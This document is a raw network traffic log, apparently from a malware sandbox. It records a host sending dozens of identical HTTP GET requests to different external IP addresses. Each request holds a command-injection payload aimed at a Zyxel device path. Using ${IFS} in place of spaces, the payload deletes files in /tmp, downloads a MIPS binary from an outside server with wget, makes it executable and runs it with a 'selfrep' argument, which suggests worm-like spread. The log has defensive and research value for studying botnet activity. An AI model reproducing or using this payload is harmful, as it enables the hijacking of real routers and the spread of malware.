                                            Jan 14, 2024 15:50:53.689718962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8093192.168.2.2359498210.201.144.156443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.689734936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8094192.168.2.2350076181.242.96.205443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.689795017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8095192.168.2.2337522202.103.15.115443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.689806938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8096192.168.2.235608678.153.92.241443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.689840078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8097192.168.2.234985463.31.24.209443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.689896107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8098192.168.2.235013843.128.232.200443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.689919949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8099192.168.2.234289269.8.240.203443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.689932108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8100192.168.2.2349800213.124.4.180443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.689974070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8101192.168.2.235049838.210.161.39443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.689980984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8102192.168.2.2335218223.5.182.10443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.689996004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8103192.168.2.2356962197.135.207.196443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.690026999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8104192.168.2.2358878154.162.231.50443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.690063953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8105192.168.2.2356500208.237.137.114443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.690080881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8106192.168.2.235300657.238.123.150443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.690131903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8107192.168.2.234561473.85.13.109443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.690152884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8108192.168.2.2349364188.28.255.56443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.690176964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8109192.168.2.233384434.2.246.24443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.690220118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8110192.168.2.2344294133.49.228.233443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.690251112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8111192.168.2.2342348172.69.20.20443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.690298080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8112192.168.2.2359012154.17.51.251443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.690309048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8113192.168.2.2336690145.158.129.8443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.690309048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8114192.168.2.235849650.25.173.42443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.690363884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8115192.168.2.2342536103.8.240.121443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.690418005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8116192.168.2.23438521.224.222.81443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.690438032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8117192.168.2.2360144186.21.247.115443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.690476894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8118192.168.2.2341496192.81.172.238443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.690485001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8119192.168.2.2333322192.112.3.51443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.690527916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8120192.168.2.2344486163.72.103.242443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.690543890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8121192.168.2.233406849.119.187.66443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.690555096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8122192.168.2.2358862206.168.74.242443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.690561056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8123192.168.2.2351774176.186.13.135443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.690609932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8124192.168.2.2341872203.25.227.58443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.690620899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8125192.168.2.233284470.234.111.40443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.690634966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8126192.168.2.2336102205.208.45.149443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.690696955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8127192.168.2.235282043.107.6.67443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.690717936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8128192.168.2.235329657.184.228.185443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.690721989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8129192.168.2.2345016222.220.44.43443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.690752983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8130192.168.2.235786471.130.122.149443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.690764904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8131192.168.2.2344164112.57.71.176443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.690824032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8132192.168.2.235949271.206.83.146443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.690860033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8133192.168.2.234282695.83.12.195443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.690861940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8134192.168.2.2359066183.89.48.92443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.690885067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8135192.168.2.2339884106.248.21.196443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.690926075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8136192.168.2.2352288213.254.28.211443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.690979958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8137192.168.2.2343564116.126.247.189443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.691000938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8138192.168.2.234050041.226.59.224443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.691026926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8139192.168.2.2356076161.193.103.181443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.691046953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8140192.168.2.235713848.180.72.126443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.691097021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8141192.168.2.236082470.14.46.187443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.691132069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8142192.168.2.235482076.31.225.131443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.691178083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8143192.168.2.2342292133.226.47.44443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.691201925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8144192.168.2.233739898.135.209.254443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.691246986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8145192.168.2.2353942100.230.230.47443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.691267014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8146192.168.2.234905884.71.138.88443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.691272020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8147192.168.2.2352862125.131.200.242443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.691298008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8148192.168.2.2358432115.33.179.192443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.691344023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8149192.168.2.234199651.224.251.182443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.691370964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8150192.168.2.2333340184.27.52.134443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.691425085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8151192.168.2.234258414.147.6.127443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.691441059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8152192.168.2.2346498167.242.19.65443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.691503048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8153192.168.2.2354734124.248.226.9443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.691530943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8154192.168.2.235557263.212.86.120443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.691585064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8155192.168.2.2345866140.24.142.227443
                                            TimestampBytes transferredDirectionData
